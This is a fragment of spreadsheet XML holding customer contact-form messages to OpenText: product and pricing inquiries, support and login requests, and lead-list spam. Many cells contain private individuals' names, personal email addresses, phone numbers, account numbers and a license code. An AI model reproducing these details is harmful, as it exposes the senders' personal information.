I wanted to reach out and check whether you have need of database of various prospects needing IBM Users._x000D_
_x000D_
We can provide you customized data based on your target criteria. We provide Various key decision makers where IBM users mainly used in various industries like Information Technology, Healthcare, Marketing, Telecommunications, Biotechnology, Real Estate, Travel, Publishing, Manufacturing, Finance &amp; Banking, Education and more.. _x000D_
_x000D_
Kindly mention the parameters below to access free samples for your reference._x000D_
_x000D_
Target Industry:_x000D_
Target Job Title:_x000D_
Target Geography:_x000D_
_x000D_
Look forward for your response._x000D_
_x000D_
Regards,_x000D_
Amber Winters_x000D_
Marketing Manager</t>
  </si>
  <si>
    <t xml:space="preserve">Time sensitive request.   Interested in getting Exstream quoted for potential state government client opportunity.   </t>
  </si>
  <si>
    <t>I am intertesed in OpenText Brava! for IBM Solutions.  In particualr Brava for IBM Content Navigator and FileNet Content Manager</t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Hope you are the right person to discuss about our updated database of Key IT/Technology decision makers? _x000D_
_x000D_
Business titles include-_x000D_
_x000D_
CTO's, CIO's, Chief Architect, VP/Director/SVP/Application Development, Solutions Architect, Infrastructure Managers, Data Center Owners/Manager/Directors, Systems Software Manager, Developer, Manager Information Services, Network and Communications Managers, Data Center and Cloud architects, Information Technology Project Manager, Network Manager, VP/Director of IT, IT Manager, Product Management,National co-op leaders, Co-op insiders, Engineering, BI Analysts, BI Architects, Data Analysts and all other key decision makers in the industry who might be looking for-_x000D_
_x000D_
Consultants ,Distributors, Manufacturers, Software Providers, Service Providers whose area of business is Wire, cables, transformers, SCADA, GIS, demand side management, power quality, utility vehicles, construction equipment, telecommunications, Electronics,Information Technology, Communication Technology etc_x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria:_x000D_
_x000D_
Target Industry :_x000D_
Target Job title :_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Alice Miller_x000D_
Marketing Manager_x000D_
_x000D_
If you do not wish to receive further Emails Kindly reply with "Leave-Out".</t>
  </si>
  <si>
    <t>Meeting of July 12 . As I explained to Lynn, my daughter and only child just passed away. I need an extension of a month. At that  sametime either the problem will be resolved or we can meet.</t>
  </si>
  <si>
    <t>Working on Global Travel project that Magellan matches all criteria. Very interested would be an understatement.....</t>
  </si>
  <si>
    <t>we´re already user for Edocs DM, im interesting in a conflict check software, could you sendme information about it</t>
  </si>
  <si>
    <t>I need to understand how can I order licenses for my project  , the licenses procurement contract was already signed.</t>
  </si>
  <si>
    <t>We own a Qfiniti product. We need to know who our Account Representative for Qfiniti is? We have some technical questions around our product and upgrade. Thanks. Ben</t>
  </si>
  <si>
    <t xml:space="preserve">The Ministry of Advanced Education and Skills Development is reviewing this fall its computer program standards and would appreciate Opentext’s participation in providing feedback on the skills, knowledge and attitudes required of graduates of Ontario college computer programs._x000D_
Please advise who we can reach out to from Opentext for the above project._x000D_
Thanks &amp; Rgds_x000D_
George_x000D_
_x000D_
George Lim-Fat,_x000D_
Senior policy advisor_x000D_
Program Standards and Evaluation Unit,_x000D_
Ministry of Advanced Education and Skills Development  _x000D_
Tel: 416 212 6697_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a software distributor based in Germany specialized in sourcing._x000D_
_x000D_
We have a French corporate customer ALSTOM POWER who would like to order through us one of your solution. _x000D_
_x000D_
Could you give me the pricing, our conditions, coupon code, order link and process  for: _x000D_
_x000D_
-	1 license  OpenText™ Gupta SQLBase (SQL Base version  11.7) _x000D_
-	http://www.opentext.com/what-we-do/products/specialty-technologies/opentext-gupta-development-tools-databases/opentext-gupta-sqlbase_x000D_
_x000D_
_x000D_
Is the software UI multilingual?_x000D_
The licence delivery is electronically, right?_x000D_
_x000D_
Thank you for your quick answer_x000D_
_x000D_
Kind regards_x000D_
_x000D_
Denis Trohel_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Hope you are doing great._x000D_
_x000D_
I wanted to reach out and check whether you have need of database of various prospects from the sectors mentioned below to whom you can reach out with products and services of Logistic and Transportation software_x000D_
_x000D_
We can provide you customized data based on your target criteria. We provide Business executive contact information from various industries like Airline, Airport operation, Oil &amp; Gas Logistics, Freight beings, Tourism, General Transportation, Customer Relationship Management and many more._x000D_
_x000D_
Kindly mention the parameters below to access free samples for your reference. _x000D_
Target Industry:_x000D_
Target Job Title:_x000D_
Target Geography:_x000D_
_x000D_
Regards,_x000D_
Kevin Daniels | Marketing Manager_x000D_
kevin@sublimedata.us_x000D_
www.sublimedata.us</t>
  </si>
  <si>
    <t>I am a private practitioner of psychotherapy and need fax capability about once a month for a few pages.  What sort of deal could you set me up with.</t>
  </si>
  <si>
    <t>Requesting a quote on the Web Content Management product for a 12-month period for a 3000 page website.</t>
  </si>
  <si>
    <t>We currently have an in house EDI system, we're interested in exploring EDI outsourcing opportunities.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I am the Director of IT for IBRI.  We are beginning an evaluation of ECM systems.  I'd like to have a little chat before we go into an RFP stage to gather some more information about M-Files and the solutions you provide._x000D_
_x000D_
There about 20 people employed by the institute at this time.  _x000D_
_x000D_
I'm largely looking at document management and document workflow solutions from the ECM at this time.  I'm would like to know a little about how we could integrate the ECM with other systems such as financial systems and intranet._x000D_
_x000D_
And finally, I would like to get a very ballpark estimate of the cost to expect as this will drive how formal we have to be in the selection process._x000D_
_x000D_
Thank you,_x000D_
Jacob Smith</t>
  </si>
  <si>
    <t>Is there a way to access and download my invoices through this website?</t>
  </si>
  <si>
    <t>Please contact me regarding unpaid payroll withholding tax to the city of Brook Park in Ohio.  Employees working at 5347 W.161 st. Brook Park, Ohio  44142.  These employees are subject to a 2% withholding tax for working in Brook Park. You as their employeer are responsible for payment of these monies.  Please contact ASAP regarding this.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
One my my teammates uses Open Text eDocs DM version 5.3.01338 on her Windows 7 Enterprise / Dell Optiplex 9010. _x000D_
 Alberta Andrews has historically been able to use the eDocs toolbar in Windows Explorer w/o issue.  _x000D_
_x000D_
Alberta got married and her name changed to Alberta Clemons.  Her user name and Active Directory account now show clemonsal instead of her original andrewsal account._x000D_
_x000D_
Ever since the name change, she is unable to access the eDocs toolbar in Windows Explorer.  The option is grayed out and we cannot enable it.  I made sure Alberta has local admin rights to the system._x000D_
_x000D_
Do you have any idea why the toolbar stopped working after the user name update?  Any idea on how to restore the toolbar?_x000D_
_x000D_
Thank you,_x000D_
Hanson Ling</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a contact email address to issue a Request for Proposal (RFP) for Digital asset Management Services. If you could send me an email with whom I should direct this type of request to, I will gladly send off the documentation to them for their review. Thank you Lindsay </t>
  </si>
  <si>
    <t>One of my clients has started supporting an opentext user and I was wondering if opentext has a approved suppliers process, similar to IBM, Oracle, SAP etc..</t>
  </si>
  <si>
    <t>Good Day _x000D_
I would like to speak to the person managing your display at the Gartner Symposium Conference in Cape Town South Africa._x000D_
Please could you be so kind as to put me in touch with the correct person?_x000D_
Many thanks_x000D_
Tanielle</t>
  </si>
  <si>
    <t>Can you confirm if Exceed v14 is compatible with Windows Server 2008R2 and 2012R2?</t>
  </si>
  <si>
    <t>Hello.  I would greatly appreciate a contact at Open Text who can point us in the right direction regarding the items below.  Thank you for your kind assistance.  Mitch_x000D_
_x000D_
We have analyzed and documented functional requirements for our Legal Department and would like to explore the fitness of Open Text products.  We are seeking sales or customer service representative that can assist.  _x000D_
_x000D_
We currently use OpenText eDocs v5.3 in the Legal Department. I'm not confident we understand the full functionality that eDocs offers.   We are interested in understanding the value of upgrading and whether any additional functionality is included.  We are also interested in understanding what other products Open Text may have that meet our requirements.  _x000D_
_x000D_
While the Legal Department is the immediate concern, we also have a vision for extending the document management/work flow functionality to the rest of the company.  _x000D_
_x000D_
Thanks, Mitch</t>
  </si>
  <si>
    <t xml:space="preserve">Issue with opentext pdf converter. </t>
  </si>
  <si>
    <t>Curious about what plans our company has for integrating data and robotics since I have a degree in robotics. I have heard there is a group in Canada doing some things with robotics but no one seems to know much more than that. If you could provide a contact email in this area that would be great.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
im Zuge einer Marktrecherche für eine potentielle Ausschreibung sind wir auf Ihr Unternehmen gestoßen. Ich würde Sie bitten, mir die Kontaktdaten eines Ansprechpartners im Vertrieb zu nennen, an welchen wir uns im Falle einer Angebotsanfrage wenden können._x000D_
_x000D_
Vielen Dank im Voraus._x000D_
Mit freundlichen Grüßen,_x000D_
_x000D_
Leni Baudler</t>
  </si>
  <si>
    <t>Migration/Upgrade</t>
  </si>
  <si>
    <t xml:space="preserve">Request for a cost </t>
  </si>
  <si>
    <t>Hello! _x000D_
I found this piece in your blog: https://blogs.opentext.com/secure-information-exchange-forgotten-in-your-digital-transformation-strategy/_x000D_
_x000D_
And I was wondering if we could publish it (with due credit &amp; your permission) on our B2B X website: http://b2b-x-summit.iqpc.de_x000D_
_x000D_
 B2B X is a summit for European manufacturers going into digital &amp; eCommerce, and as part of the production team, I want to have curated, thought-leading content on the site to give visitors a better idea of the topics that will be featured during the event. This blog post (among many others) of yours I've read is a perfectly succinct guide that I know our attendees would appreciate. _x000D_
_x000D_
Would this be ok form your end? Please let me know either way :) _x000D_
Look forward to hearing back from you soon!_x000D_
_x000D_
Best, _x000D_
_x000D_
Karina</t>
  </si>
  <si>
    <t>We would like a demo of opentext DAMS</t>
  </si>
  <si>
    <t>Password Lost Tech Support, Model A104 Open Text. The login details have been lost, is there anyway to get back into this device to reset the password please?</t>
  </si>
  <si>
    <t>interested in OCR solution for our company</t>
  </si>
  <si>
    <t>StorQM / ORF Migration</t>
  </si>
  <si>
    <t>Require Exceed 14.0.5 and Exceed 15.0 source files ._x000D_
Our package of Exceed got corrupted and i am unable to deploy Exceed 14 and 15 version. Please provide me link to download these versions._x000D_
Thanks_x000D_
Anish Ved</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I would like to learn more about the pricing for 1. OpenText Analytics Designer 2. OpenText Actuate Studio 3. OpenText Dashboard._x000D_
_x000D_
Additionally, how these work together as I'm assuming the designer is required for creating dashboards? Or is it possible to manage data, create visualizations, as well as execute ad-hoc reporting with the OpenText Dashboard? _x000D_
_x000D_
Thank you,_x000D_
Chris  _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>looking at document generation capability</t>
  </si>
  <si>
    <t>Good day. I am interested in one of your open positions in Makati. I want to know if you accept walk-in applicants. Thank you.</t>
  </si>
  <si>
    <t>Please re-instate my email access sharma_98@hotmail.com. I do access via this account from remote locations.</t>
  </si>
  <si>
    <t>I am unfamiliar with what resource I have to help me manage our RightFax Server. We are using Windows Server 2008, RightFax Enterprise Fax Manager 10.5.1.4432.  My current problem is that we are getting calls that recipients are receiving duplicate faxes.  I assume it's getting an error and resending, but the error must happen near the end of the fax?  So the recipient sees it as a duplicate while rightfax sees it as a resend due to error?  But I'm having difficulty figuring out where to find things in the server module and where to adjust configuration if need be.  OR are you aware if your software conflicts with Malwarebytes?  We recently installed that....</t>
  </si>
  <si>
    <t>In renewing my PCard credit card auto payment with UNM Purchasing, I was asked for a copy of a service agreement for the service you provide us. Are you able to provide one? Our account number is WVKC040519.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
I just notarized a document for Mitch Gershonowitz in the New York office and I wanted to ensure he had the correct commission date on my notary stamp (it expires in 2020). Do you have contact information for him?_x000D_
_x000D_
Best,_x000D_
_x000D_
Alanna Rohan</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested to get in touch with all Top Decision Makers of Oracle Users across Globe? _x000D_
_x000D_
Database includes complete information like: Company Name, Contact Name with First name, Last Name, Phone Number, Fax Number, Physical Address with City, State, Country, Zip Code, SIC Code, Revenue Size, Employee Size, Website URL and Permission Passed Email Address._x000D_
_x000D_
_x000D_
Kindly Let me know your target criteria:_x000D_
_x000D_
Target Title: _x000D_
Target Industry: _x000D_
Target Geography: _x000D_
_x000D_
We will get back to you with samples, which will be at no cost._x000D_
_x000D_
We can also provide you the data for the below:_x000D_
_x000D_
Microsoft Dynamics AX_x000D_
Microsoft Dynamics GP_x000D_
Microsoft Dynamics SL_x000D_
Microsoft Dynamics CRM_x000D_
Microsoft Share point_x000D_
SAP_x000D_
Sage And More._x000D_
_x000D_
Look forward for your Positive response._x000D_
_x000D_
Regards,_x000D_
Anna Klapviz</t>
  </si>
  <si>
    <t>We are a current Hyland OnBase customer and are checking out our options.</t>
  </si>
  <si>
    <t>Trying to access Knowledge Base for implementation documentation.</t>
  </si>
  <si>
    <t>We are submitting bid for document collaboration and integration proposal for a local city government body. Document redaction capabilities is one of their must-have features. We would like to propose SharePoint with OpenText™ Brava!™ for_x000D_
Microsoft® SharePoint® as the platform for our bid response. We are interested in learning more about the product and pricing to incorporate in to our response.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in acquiring a list of Imaging Software ?_x000D_
_x000D_
We have complete contact details of : Chemical imaging, Digital imaging, Disk image, Document imaging, Geophysical imaging, Industrial process imaging, Medical imaging( Medical optical imaging, Magnetic resonance imaging), Molecular imaging, Personal imaging, Radar imaging, Reprography ( Cinematography, Photography and Xerography), Speckle imaging, Stereo imaging, Thermography, Tactile Imaging  and many more who might be interested in your product and services._x000D_
_x000D_
If this is not your target industry, Kindly let me know your target criteria:_x000D_
 _x000D_
Target Industry :_x000D_
Target Geography :_x000D_
Target Job Title :_x000D_
_x000D_
Best Regards,_x000D_
Kiyara James_x000D_
Marketing Manager_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We received a letter signed by John Doolittle to notify your customers of an ERP upgrade to your systems.  However as far as I know we are not a client of your company?  Can you validate this is correct and someone in my company has not purchased any services from your company._x000D_
_x000D_
Thank You</t>
  </si>
  <si>
    <t>Check</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam_x000D_
Appreciate you support to resend us the SUID for PO#4027388 </t>
  </si>
  <si>
    <t>Rightfax remote boardserver is down and need to reconfigure rightfax to only send out via FoIP. Faxes stuck in "waiting to be sent" status</t>
  </si>
  <si>
    <t>opentext pdf converter driver for 64 bit desktop machines.  If you can please provide the link for me to download the corresponding files.  Thanks_x000D_
Kathleen</t>
  </si>
  <si>
    <t>problems in billing</t>
  </si>
  <si>
    <t>I am a consultant working with a client that is currently using an older version of Documentum, but is looking to update to either a newer version, or potentially a DAMS like Media Management or Media Bin. I would like to speak with someone about the client's requirements, and get some recommendations on what might be the best fit. Our contact at OpenText for Documentum has not responded to our inquiries over the past 3 weeks, so I am hoping someone else can be in touch with me.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, I was looking for an evaluation copy of the Gupta NXJ Developer on your site. but I could not find it on the download resources. Could you please help me with it. </t>
  </si>
  <si>
    <t>We currently have ZetaFax, 30 users, 5 groups.  We auto print all faxes received by our main number.  We want to also, auto-export, all faxes, as they come in, to a network folder, as PDF's.  Zetafax can't do this.  Can your software?</t>
  </si>
  <si>
    <t>We would like to make sure our contract does not auto renew 12/31/17_x000D_
_x000D_
Please confirm receipt of e-m ail.</t>
  </si>
  <si>
    <t>Hello,_x000D_
I would like to inquire, regarding a new method for texting utilizing a Laptop and a Desktop, such as a Texting Note to Cellular. This is due to emails being a new paid service and many teens or adults who are non-email based users.  The email non-users all  users of Texting, now from a Laptop sending a text message is to use the recipients' cellular number@ the domain users.com;_x000D_
example: 12345678@textbell.com._x000D_
Many parents, and friends will lose out on communication since, it was mainly email source based, so the new request is for Open Text to offer Texting Note to Cellular which Open Text can sell it to _x000D_
Canada Post Corporation since they are offering email hosting services.  More users are looking for texting services to send through from laptops and desktops due to non-cellular connections._x000D_
This new texting notes to cellular is recommended to all who still prefer to write a note and zip out to a text to other cellular users._x000D_
Thank You,</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam,_x000D_
_x000D_
We are the appointed pre-employment screening representatives and have been asked to confirm that our Candidate was employed at Open Text._x000D_
_x000D_
I would be grateful if you could provide contact details to you HR or to the person who would be able to confirm the dates of employment and position held and I will send a request for verification with the Candidate's details.  _x000D_
_x000D_
Thank you in advance for your kind assistance._x000D_
_x000D_
_x000D_
DAMILOLA ADEBAYO | Service Delivery Team | Gun Court, 70 Wapping Lane | London, E1W 2RD_x000D_
0044 127 376 0946 Tel | 5012448 Internal Direct | 0044 127 376 0549 Fax_x000D_
 _x000D_
HireRight Limited is a limited liability company incorporated in England (registered number 4036193) whose registered office is at Gun Court, 70 Wapping Lane, London, E1W 2RD._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Hope to speak with Product Spcialist to understand OpenText replacement for Jetforms Solutions (a legacy application for printing business reprots). The requirement is urgent.</t>
  </si>
  <si>
    <t xml:space="preserve">Solution to Integrate SAP and SharePoint 2016. </t>
  </si>
  <si>
    <t>Not able to sign in.</t>
  </si>
  <si>
    <t xml:space="preserve">I need to add new employee access to our account. </t>
  </si>
  <si>
    <t>I need to know the renewal coverage expiry date for documents, _x000D_
Sales Order Number: 64778833 | LAC#: HJGVHW6JD0RBGYPT6LFN / BS3K5Y7S37HNVXFSQ4BN.</t>
  </si>
  <si>
    <t>Inadequate support from the current open text account manager assigned to West Pharmaceutical.</t>
  </si>
  <si>
    <t>Good morning,_x000D_
_x000D_
We currently utilize RightFax. I'm looking to download the plugin for Outlook (Version 2010, 2013, &amp; 2016). Can you please provide guidance on how to retrieve that?_x000D_
_x000D_
I'm also looking for information on how to upgrade our web client. On a recent professional services engagement this was discussed as a valuable option._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Ben</t>
  </si>
  <si>
    <t>Quotation for 1 x Hummingbird Exceed Individual Licence Version</t>
  </si>
  <si>
    <t>多是范德萨范德萨范德萨</t>
  </si>
  <si>
    <t xml:space="preserve">pricing rightfax to integrate with CUCM 11.X with 250 users lic  </t>
  </si>
  <si>
    <t>We want to know the cost of Captive software</t>
  </si>
  <si>
    <t xml:space="preserve">unten ein Beispiel von regelmäßig verschickten emails, die Informationen zu Zahlungsavisen beinhalten. Bitte diese emails nicht mehr an susanne.schmidmaier@sonax.de sondern an Finanzbuchhaltung@sonax.de senden. Danke!_x000D_
_x000D_
-----Ursprüngliche Nachricht-----_x000D_
Von: GEPARA ADMIN [mailto:GEPARAADMIN@opentext.com]_x000D_
Gesendet: Dienstag, 10. Januar 2017 01:47_x000D_
An: SCHMIDMAIR Susanne_x000D_
Betreff: EMAIL_GCO52715114OY_20170110_628014126_x000D_
_x000D_
Remittance Advice_x000D_
-- Avis de Paiement -- Zahlungsanweisung -- Aviso de Pagamento -- Aviso de Pago --_x000D_
_x000D_
_x000D_
Buyer Company:_x000D_
ADAM OPEL GMBH_x000D_
Postfach 17 10_x000D_
Russelsheim, D-65423_x000D_
DE_x000D_
_x000D_
Supplier:_x000D_
SONAX GMBH_x000D_
_x000D_
Postfach 16 09_x000D_
86621 NEUBURG Alemania_x000D_
_x000D_
DE_x000D_
_x000D_
Phone: no data_x000D_
Fax: no data_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Conocer sobre la solución de BPM para procesos empresarial._x000D_
_x000D_
Agradezco me contacte para conocer más sobre la empresa y la solución que ofrecen._x000D_
_x000D_
Gracias.</t>
  </si>
  <si>
    <t>Good Morning_x000D_
We currently have Wireless DMS licences and I was hoping you could advise how these work i.e. are the licences concurrent so anyone can access it but access it limited to how many licences we own or is it single user licencing where we have to licence any user who wants access (even if they don't frequently use it)?_x000D_
Thanks so much _x000D_
Jayne</t>
  </si>
  <si>
    <t>Looking for a partner to automate invoice delivery to customer portals and automated credit card processing</t>
  </si>
  <si>
    <t>Need to be able to log in to support.</t>
  </si>
  <si>
    <t>Need contact to support reselling Easylink. We are reseller. _x000D_
313-333-0539 Mobile_x000D_
Ed Karpinski</t>
  </si>
  <si>
    <t>email address - we currently get our invoice from the following email address: &lt;xpedite_billing@tmr3.com. Is this the correct email and why is the suffix "tmr3"?</t>
  </si>
  <si>
    <t>Interested in an enterprise content management system for our company.</t>
  </si>
  <si>
    <t xml:space="preserve">I would like to briefly introduce myself and the publication I represent._x000D_
My name is Colleen Mann and I am an Advertising Consultant with the Genesee Valley Penny Saver._x000D_
_x000D_
If you are not familiar with our award-winning publication, the Genesee Valley Penny Saver is a free community paper that is distributed every Friday throughout Monroe, Livingston, Genesee, Ontario, Orleans and Steuben counties. Our paper reaches over 150,000 homes and businesses!_x000D_
_x000D_
We are a family owned publication that began in 1948 as a small operation and have continued to grow and are still growing today with our main office in Avon, NY and satellite offices in Batavia, Brockport, Canandaigua and Dansville. _x000D_
_x000D_
Our publication is audited annually by the Circulation Verification Council (CVC). The Genesee Valley Penny Saver continues to maintain top results for Free Community Papers, staying first in NY State for community papers and in the top 1% of community papers in North America for market penetration, readership and reader influence. The CVC results show that we reach 98.1% of all homes and businesses in our circulation area, and 81% of our readers respond to the paper’s advertisements. _x000D_
_x000D_
In addition to our award-winning advertising we also offer a full line of printing and promotional products including business cards, invitations, t-shirts and more._x000D_
_x000D_
Please do not hesitate to contact me with any questions regarding the Genesee Valley Penny Saver. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, We are looking for B2B EDI &amp; MFT solution for our organization. How can we proceed further with discussion &amp; DEMO?_x000D_
Thanks,_x000D_
Varinder_x000D_
</t>
  </si>
  <si>
    <t>I cannot access my support online._x000D_
our support contract no  0012269023 thru Gupta</t>
  </si>
  <si>
    <t>We are “vacuum storage bag” manufacturer based in Turkey, founded in 1994. Our brand is MAGIC SAVER BAG. We are the sole manufacturer in USA and Europe. We have office and warehouse in Chicago, Illinois. We have been working with chain markets all over the World, such as Carrefour, Spar, Bauhaus, Metro, Zeeman and also we are supplier of Amazon.com. We have exported our goods more than 75 countries up to now. We have reached up to 50.000.000 pcs annual production capacity with our qualified employees. As we have been working with chain markets we are being audited periodically by them. That means I can supply you any kind of certificate such as BSCI, INTERTEK, REACH, ROHS, ISO, etc., We are all ready with our quality, capacity and service to cooperate with you._x000D_
There are 2 companies that sell vacuum bag in USA. One is Ziploc and the other one is Space Bag. Ziploc is everywhere and also in Bad Bath &amp; Beyond. However we have so many advantages when compared to them. We have best raw material, service, quality and price. _x000D_
We always support our clients with visuals, advertisements, televisions and display boxes. _x000D_
P.S. My name is Okan TASKIN. I am the Territory Executive and Authorized Contact of the company. Here is my e-mail address  okantaskin@egemen-group.com    _x000D_
If you are interested in our products please feel free to contact me. _x000D_
Thank you in advance for your kind cooperation.		_x000D_
Best regards,		_x000D_
Okan TASKIN</t>
  </si>
  <si>
    <t>trying to reset password. and I do not know which email reset password is being sent to but I am not receiving at susanj.altare@gmail.com      network id: CS1875</t>
  </si>
  <si>
    <t>Received letter from OpenText indicating vendor relationship...OpenText isn't a listed vendor with us nor do we appear to have invoices on file.  Requesting copy of contract/MSA.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, _x000D_
I support a Federal Agency who is looking to implement a Document Management platform within an on-premises data center. Our total user count is around 35,000 but the storage and retreivial will all be handled through web applications like procurement and financial software. Would you be able to provide high level licensing and support costs? I'm in training this week but can be available to chat. _x000D_
</t>
  </si>
  <si>
    <t>We would like to talk to a representative on the OpenText suite of products and how some may be leveraged to help us meet our requirements.   There may be an OpenText representative already assign to Prudential but would like to discuss solutions specific to the Retirement business needs.  One use case we have is creating complex documents both batch and one offs with ever changing data requirements while business is asking for more control.  We currently use Exstream for this document creation with many processes and applications surrounding it.  We also use Pageflex for some marketing and non-marketing documents.   Each time a new plan is sold technology needs to get involved to extract additional data and to make associated template changes.  We have other use cases in our contracts process as well where a Customer communications management tools are needed.   Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Discuss OpenText DAM and BPM solutions for an enterprise solution. Timetable to make a decision on platform support is 2 weeks. </t>
  </si>
  <si>
    <t>I was unable to attend this year's conference in Toronto.  Where will the 2018 conference be held?</t>
  </si>
  <si>
    <t>hey</t>
  </si>
  <si>
    <t>Question regarding transfer of records out of HPE CM.</t>
  </si>
  <si>
    <t>I'm looking to solve an issue with logging in to the First Class mobile app on my iPhone and iPad._x000D_
Whenever I enter my password the app automatically adds to symbols to the end of my password, making it invalid and therefore not allowing me to log in successfully to my account. _x000D_
There is no icon/button showing on the top right hand corner called Detail disclosure my iOS app that allows me to access the settings file for my accounts._x000D_
Any help in resolving this would be appreciated._x000D_
_x000D_
best regards,_x000D_
Robin Temple</t>
  </si>
  <si>
    <t>Trying to get access to the http://testdrive.eimdemo.com/en/opentext-tv site.  When I enter my email address, I do receive a link via email.  However the link takes me back to the same page that I must enter my email for access again and does not allow me through any further.  Please assist</t>
  </si>
  <si>
    <t>I would like to get an initial quote for enterprise content management solution</t>
  </si>
  <si>
    <t xml:space="preserve">To whom it may concern, _x000D_
_x000D_
I have been trying to contact with Mr. Kevin Kinard, Associate Customer Impl Specialist, who is assigned to our account for getting the temporary password for accessing GXS as I noticed the password has been reset. It seems the email was never reached to Kevin. Appreciate please review and advise who else we can contact with for getting the temporary password, so we can reset the new password from our end and access GXS. _x000D_
_x000D_
Thank you_x000D_
_x000D_
Regards_x000D_
Cathy </t>
  </si>
  <si>
    <t xml:space="preserve">Good Afternoon _x000D_
I was wondering if your clients ever ask if you know anyone that can help with payment acceptance? _x000D_
Jet Pay is a full service Credit card processing company here in Carrollton, Texas. We have a very lucrative partner program I would love to talk with you about. _x000D_
Look forward to hearing from you._x000D_
Have a great Day_x000D_
</t>
  </si>
  <si>
    <t>Need to quote some options for Desktop Faxing</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
bieten Sie eine Trial-Version für Ihre OpenText Business Intelligence Software (BI-Query) an? Wo lässt sich diese herunterladen. Können Sie uns eine Preisauskunft für die Software und entsprechende Lizenzen zur Verfügung stellen? Vielen Dank._x000D_
MfG_x000D_
U. Wesselkamp</t>
  </si>
  <si>
    <t xml:space="preserve">FirstClass for Windows, what is they keyboard shortcut to change email title color? on Email Title, Left Click -&gt; Color -&gt; Red. How do I do this using a keyboard? Please respond asap. </t>
  </si>
  <si>
    <t xml:space="preserve">I own my own firm and love this product.   *(I don't use AutoCAD, but love the B&amp;W simple look!)_x000D_
I need this for both my Desktop Computer in my office and my Laptop for home use.   Autodesk lets me have 2 seats automatically as the Principal.    May I load this on to my 2 machines for the price of one seat?_x000D_
</t>
  </si>
  <si>
    <t>I'd like to set up a chat to discuss the data retention project I am heading at IIROC.</t>
  </si>
  <si>
    <t>Would love to chat to someone regarding your SMS application and Shoretel integration. This is regarding a Tender dead line for the 12th of July. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
How about owning a compiled list of “Microsoft Azure” Customers for your promotion initiatives, general campaign, webinars and many more._x000D_
_x000D_
If not Microsoft Azure, own a customers list of _x000D_
•	IBM Bluemix_x000D_
•	Google App_x000D_
•	Amazon S3/ EC2_x000D_
•	Rackspace Managed Cloud and many more._x000D_
_x000D_
List includes: Application Type, Business Name, Contact Name, Title, Email Address, Phone Number, Physical Address, Fax number, Industry type, SIC/NAICS, LinkedIn URL and more._x000D_
_x000D_
Please review and let me know your thoughts so I could send few samples for review._x000D_
_x000D_
Regards,_x000D_
Ashley Benson_x000D_
Lead Generation Specialist_x000D_
Ph. +1 914-499-0054_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Would you be interested in Act-On Customers?_x000D_
_x000D_
Also we have other Users:_x000D_
_x000D_
•	HubSpot _x000D_
•	Marketo  _x000D_
•	SalesForce Pardot_x000D_
•	Oracle Eloqua_x000D_
•	InfusionSoft  and so on.,_x000D_
_x000D_
Data field includes: Application type, Company Name, Executive Name, Job Title, Full Mailing Address, Phone Number, Fax Number, Website, Email, Employee Count, Sales Volume and many more._x000D_
_x000D_
We also provide Appending/Enrichment service for the incomplete in-house data._x000D_
_x000D_
If you are interested , Kindly let me know your target, so that I can get back to you with more information._x000D_
_x000D_
Best Regards,_x000D_
Patricia brown  _x000D_
Sr. Marketing Manager _x000D_
</t>
  </si>
  <si>
    <t>Attempting to create a license file for Content Server 16.2.1 but the link fails.  My finger print number is 	_x000D_
C898C806</t>
  </si>
  <si>
    <t>request for 'my support' content access</t>
  </si>
  <si>
    <t>Bonjour,_x000D_
_x000D_
Je suis en charge d’une étude de l’éditique pour un établissement publique._x000D_
J’ai quelques questions par rapport à votre produit : OpenText StreamServe R16_x000D_
_x000D_
est que vous pouvez me donner la fréquence de publication de patchs correctifs et nouvelles versions du produit :_x000D_
Le prix de mise en place et d’exploitation :_x000D_
Les technologies utilisées pour votre produit :_x000D_
Par rapport au mode d’acquisition :_x000D_
-	UGAP (Oui/Non) : _x000D_
-	direction des achats (Oui/Non) :_x000D_
-	groupement des achats inter-agences (Oui/Non) :_x000D_
-	appel d’offre (Oui/Non) :_x000D_
_x000D_
Merci d’avance_x000D_
Cordialement,_x000D_
_x000D_
Olivier CHAMPAGNAT.</t>
  </si>
  <si>
    <t>inquiry about Documentum certification exams</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
I am registered user on OT Learning Central (user:issacphilip@mgs-tech.com). _x000D_
I recently registered for the course Customizing the Content Suite UI with Perspective Manager(CN001413). Now I had completed both the course and module. I obtained a passing score of 90%. Once this was done, the module was marked as completed, and I saved and exited.  _x000D_
I was then taken to the Summary screen(Please see attached screenshot). I clicked on the Back button, but the course is not showing on the My Achievements page, it still shows up under My Learning Plan. _x000D_
Could you kindly assist with this, as I have completed the course and the number of attempts has increased._x000D_
_x000D_
Thank you,_x000D_
Kind Regards,</t>
  </si>
  <si>
